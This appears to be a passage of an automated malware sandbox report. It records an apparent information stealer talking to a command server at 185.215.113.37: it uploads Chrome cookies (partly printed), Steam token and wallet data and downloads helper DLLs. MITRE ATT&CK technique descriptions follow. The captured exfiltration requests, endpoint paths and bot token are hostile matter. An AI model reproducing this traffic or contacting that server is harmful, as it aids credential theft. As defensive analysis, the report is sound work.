Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDBGHDGHCGHCAAKFIIECHost: 185.215.113.37Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 44 42 47 48 44 47 48 43 47 48 43 41 41 4b 46 49 49 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 66 30 37 34 38 63 39 34 37 37 30 63 36 32 66 37 31 37 33 66 32 34 38 30 37 35 38 61 37 35 63 34 33 31 31 64 32 35 63 34 64 62 64 36 31 64 36 31 39 36 39 39 34 38 32 34 35 38 31 39 38 65 32 35 30 36 31 36 32 62 36 0d 0a 2d 2d 2d 2d 2d 2d 49 44 42 47 48 44 47 48 43 47 48 43 41 41 4b 46 49 49 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 49 44 42 47 48 44 47 48 43 47 48 43 41 41 4b 46 49 49 45 43 2d 2d 0d 0a Data Ascii: ------IDBGHDGHCGHCAAKFIIECContent-Disposition: form-data; name="token"0f0748c94770c62f7173f2480758a75c4311d25c4dbd61d619699482458198e2506162b6------IDBGHDGHCGHCAAKFIIECContent-Disposition: form-data; name="message"plugins------IDBGHDGHCGHCAAKFIIEC--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBKKFHIEGDHJKECAAKKEHost: 185.215.113.37Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 42 4b 4b 46 48 49 45 47 44 48 4a 4b 45 43 41 41 4b 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 66 30 37 34 38 63 39 34 37 37 30 63 36 32 66 37 31 37 33 66 32 34 38 30 37 35 38 61 37 35 63 34 33 31 31 64 32 35 63 34 64 62 64 36 31 64 36 31 39 36 39 39 34 38 32 34 35 38 31 39 38 65 32 35 30 36 31 36 32 62 36 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 4b 46 48 49 45 47 44 48 4a 4b 45 43 41 41 4b 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 4b 46 48 49 45 47 44 48 4a 4b 45 43 41 41 4b 4b 45 2d 2d 0d 0a Data Ascii: ------DBKKFHIEGDHJKECAAKKEContent-Disposition: form-data; name="token"0f0748c94770c62f7173f2480758a75c4311d25c4dbd61d619699482458198e2506162b6------DBKKFHIEGDHJKECAAKKEContent-Disposition: form-data; name="message"fplugins------DBKKFHIEGDHJKECAAKKE--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDAAKKEHDHCAAAKFCBAKHost: 185.215.113.37Content-Length: 6499Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/sqlite3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AAFHIIDHJEBFBFIDAKFBHost: 185.215.113.37Content-Length: 751Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 41 46 48 49 49 44 48 4a 45 42 46 42 46 49 44 41 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 66 30 37 34 38 63 39 34 37 37 30 63 36 32 66 37 31 37 33 66 32 34 38 30 37 35 38 61 37 35 63 34 33 31 31 64 32 35 63 34 64 62 64 36 31 64 36 31 39 36 39 39 34 38 32 34 35 38 31 39 38 65 32 35 30 36 31 36 32 62 36 0d 0a 2d 2d 2d 2d 2d 2d 41 41 46 48 49 49 44 48 4a 45 42 46 42 46 49 44 41 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 41 41 46 48 49 49 44 48 4a 45 42 46 42 46 49 44 41 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 56 46 4a 56 52 51 6b 76 43 55 5a 42 54 46 4e 46 43 54 45 32 4f 54 6b 77 4d 54 45 32 4d 54 55 4a 4d 56 42 66 53 6b 46 53 43 54 49 77 4d 6a 4d 74 4d 54 41 74 4d 44 51 74 4d 54 4d 4b 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 6a 4d 77 4f 44 45 31 43 55 35 4a 52 41 6b 31 4d 54 45 39 52 57 59 31 64 6c 42 47 52 33 63 74 54 56 70 5a 62 7a 56 6f 64 32 55 74 4d 46 52 6f 51 56 5a 7a 62 47 4a 34 59 6d 31 32 5a 46 5a 61 64 32 4e 49 62 6e 46 57 65 6c 64 49 51 56 55 78 4e 48 59 31 4d 30 31 4f 4d 56 5a 32 64 33 5a 52 63 54 68 69 59 56 6c 6d 5a 7a 49 74 53 55 46 30 63 56 70 43 56 6a 56 4f 54 30 77 31 63 6e 5a 71 4d 6b 35 58 53 58 46 79 65 6a 4d 33 4e 31 56 6f 54 47 52 49 64 45 39 6e 52 53 31 30 53 6d 46 43 62 46 56 43 57 55 70 46 61 48 56 48 63 31 46 6b 63 57 35 70 4d 32 39 55 53 6d 63 77 59 6e 4a 78 64 6a 46 6b 61 6d 52 70 54 45 70 35 64 6c 52 54 56 57 68 6b 53 79 31 6a 4e 55 70 58 59 57 52 44 55 33 4e 56 54 46 42 4d 65 6d 68 54 65 43 31 47 4c 54 5a 33 54 32 63 30 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 41 41 46 48 49 49 44 48 4a 45 42 46 42 46 49 44 41 4b 46 42 2d 2d 0d 0a Data Ascii: ------AAFHIIDHJEBFBFIDAKFBContent-Disposition: form-data; name="token"0f0748c94770c62f7173f2480758a75c4311d25c4dbd61d619699482458198e2506162b6------AAFHIIDHJEBFBFIDAKFBContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------AAFHIIDHJEBFBFIDAKFBContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JVFJVRQkvCUZBTFNFCTE2OTkwMTE2MTUJMVBfSkFSCTIwMjMtMTAtMDQtMTMKLmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjMwODE1CU5JRAk1MTE9RWY1dlBGR3ctTVpZbzVod2UtMFRoQVZzbGJ4Y
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KKKKEHJKFCFCBFHIIDGDHost: 185.215.113.37Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4b 4b 4b 45 48 4a 4b 46 43 46 43 42 46 48 49 49 44 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 66 30 37 34 38 63 39 34 37 37 30 63 36 32 66 37 31 37 33 66 32 34 38 30 37 35 38 61 37 35 63 34 33 31 31 64 32 35 63 34 64 62 64 36 31 64 36 31 39 36 39 39 34 38 32 34 35 38 31 39 38 65 32 35 30 36 31 36 32 62 36 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4b 4b 45 48 4a 4b 46 43 46 43 42 46 48 49 49 44 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4b 4b 45 48 4a 4b 46 43 46 43 42 46 48 49 49 44 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4b 4b 45 48 4a 4b 46 43 46 43 42 46 48 49 49 44 47 44 2d 2d 0d 0a Data Ascii: ------KKKKEHJKFCFCBFHIIDGDContent-Disposition: form-data; name="token"0f0748c94770c62f7173f2480758a75c4311d25c4dbd61d619699482458198e2506162b6------KKKKEHJKFCFCBFHIIDGDContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------KKKKEHJKFCFCBFHIIDGDContent-Disposition: form-data; name="file"------KKKKEHJKFCFCBFHIIDGD--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CGDHIEGCFHCGDGCAECBGHost: 185.215.113.37Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 47 44 48 49 45 47 43 46 48 43 47 44 47 43 41 45 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 66 30 37 34 38 63 39 34 37 37 30 63 36 32 66 37 31 37 33 66 32 34 38 30 37 35 38 61 37 35 63 34 33 31 31 64 32 35 63 34 64 62 64 36 31 64 36 31 39 36 39 39 34 38 32 34 35 38 31 39 38 65 32 35 30 36 31 36 32 62 36 0d 0a 2d 2d 2d 2d 2d 2d 43 47 44 48 49 45 47 43 46 48 43 47 44 47 43 41 45 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 43 47 44 48 49 45 47 43 46 48 43 47 44 47 43 41 45 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 43 47 44 48 49 45 47 43 46 48 43 47 44 47 43 41 45 43 42 47 2d 2d 0d 0a Data Ascii: ------CGDHIEGCFHCGDGCAECBGContent-Disposition: form-data; name="token"0f0748c94770c62f7173f2480758a75c4311d25c4dbd61d619699482458198e2506162b6------CGDHIEGCFHCGDGCAECBGContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------CGDHIEGCFHCGDGCAECBGContent-Disposition: form-data; name="file"------CGDHIEGCFHCGDGCAECBG--
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/freebl3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/mozglue.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/msvcp140.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/nss3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/softokn3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/vcruntime140.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FHIEBKKFHIEGCAKECGHJHost: 185.215.113.37Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KFCAFIIDHIDGHIECGDGIHost: 185.215.113.37Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 46 43 41 46 49 49 44 48 49 44 47 48 49 45 43 47 44 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 66 30 37 34 38 63 39 34 37 37 30 63 36 32 66 37 31 37 33 66 32 34 38 30 37 35 38 61 37 35 63 34 33 31 31 64 32 35 63 34 64 62 64 36 31 64 36 31 39 36 39 39 34 38 32 34 35 38 31 39 38 65 32 35 30 36 31 36 32 62 36 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 43 41 46 49 49 44 48 49 44 47 48 49 45 43 47 44 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 43 41 46 49 49 44 48 49 44 47 48 49 45 43 47 44 47 49 2d 2d 0d 0a Data Ascii: ------KFCAFIIDHIDGHIECGDGIContent-Disposition: form-data; name="token"0f0748c94770c62f7173f2480758a75c4311d25c4dbd61d619699482458198e2506162b6------KFCAFIIDHIDGHIECGDGIContent-Disposition: form-data; name="message"wallets------KFCAFIIDHIDGHIECGDGI--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGHJEHJJDAAAKEBGCFCAHost: 185.215.113.37Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 66 30 37 34 38 63 39 34 37 37 30 63 36 32 66 37 31 37 33 66 32 34 38 30 37 35 38 61 37 35 63 34 33 31 31 64 32 35 63 34 64 62 64 36 31 64 36 31 39 36 39 39 34 38 32 34 35 38 31 39 38 65 32 35 30 36 31 36 32 62 36 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 41 2d 2d 0d 0a Data Ascii: ------DGHJEHJJDAAAKEBGCFCAContent-Disposition: form-data; name="token"0f0748c94770c62f7173f2480758a75c4311d25c4dbd61d619699482458198e2506162b6------DGHJEHJJDAAAKEBGCFCAContent-Disposition: form-data; name="message"files------DGHJEHJJDAAAKEBGCFCA--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFCBKFHJJJKKFHIDAAKFHost: 185.215.113.37Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 46 43 42 4b 46 48 4a 4a 4a 4b 4b 46 48 49 44 41 41 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 66 30 37 34 38 63 39 34 37 37 30 63 36 32 66 37 31 37 33 66 32 34 38 30 37 35 38 61 37 35 63 34 33 31 31 64 32 35 63 34 64 62 64 36 31 64 36 31 39 36 39 39 34 38 32 34 35 38 31 39 38 65 32 35 30 36 31 36 32 62 36 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 42 4b 46 48 4a 4a 4a 4b 4b 46 48 49 44 41 41 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 42 4b 46 48 4a 4a 4a 4b 4b 46 48 49 44 41 41 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 42 4b 46 48 4a 4a 4a 4b 4b 46 48 49 44 41 41 4b 46 2d 2d 0d 0a Data Ascii: ------AFCBKFHJJJKKFHIDAAKFContent-Disposition: form-data; name="token"0f0748c94770c62f7173f2480758a75c4311d25c4dbd61d619699482458198e2506162b6------AFCBKFHJJJKKFHIDAAKFContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------AFCBKFHJJJKKFHIDAAKFContent-Disposition: form-data; name="file"------AFCBKFHJJJKKFHIDAAKF--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGHJEHJJDAAAKEBGCFCAHost: 185.215.113.37Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 66 30 37 34 38 63 39 34 37 37 30 63 36 32 66 37 31 37 33 66 32 34 38 30 37 35 38 61 37 35 63 34 33 31 31 64 32 35 63 34 64 62 64 36 31 64 36 31 39 36 39 39 34 38 32 34 35 38 31 39 38 65 32 35 30 36 31 36 32 62 36 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 41 2d 2d 0d 0a Data Ascii: ------DGHJEHJJDAAAKEBGCFCAContent-Disposition: form-data; name="token"0f0748c94770c62f7173f2480758a75c4311d25c4dbd61d619699482458198e2506162b6------DGHJEHJJDAAAKEBGCFCAContent-Disposition: form-data; name="message"ybncbhylepme------DGHJEHJJDAAAKEBGCFCA--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KKFCFBKFCFBFIDGCGDHJHost: 185.215.113.37Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4b 46 43 46 42 4b 46 43 46 42 46 49 44 47 43 47 44 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 66 30 37 34 38 63 39 34 37 37 30 63 36 32 66 37 31 37 33 66 32 34 38 30 37 35 38 61 37 35 63 34 33 31 31 64 32 35 63 34 64 62 64 36 31 64 36 31 39 36 39 39 34 38 32 34 35 38 31 39 38 65 32 35 30 36 31 36 32 62 36 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 46 43 46 42 4b 46 43 46 42 46 49 44 47 43 47 44 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 46 43 46 42 4b 46 43 46 42 46 49 44 47 43 47 44 48 4a 2d 2d 0d 0a Data Ascii: ------KKFCFBKFCFBFIDGCGDHJContent-Disposition: form-data; name="token"0f0748c94770c62f7173f2480758a75c4311d25c4dbd61d619699482458198e2506162b6------KKFCFBKFCFBFIDGCGDHJContent-Disposition: form-data; name="message"wkkjqaiaxkhb------KKFCFBKFCFBFIDGCGDHJ--

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
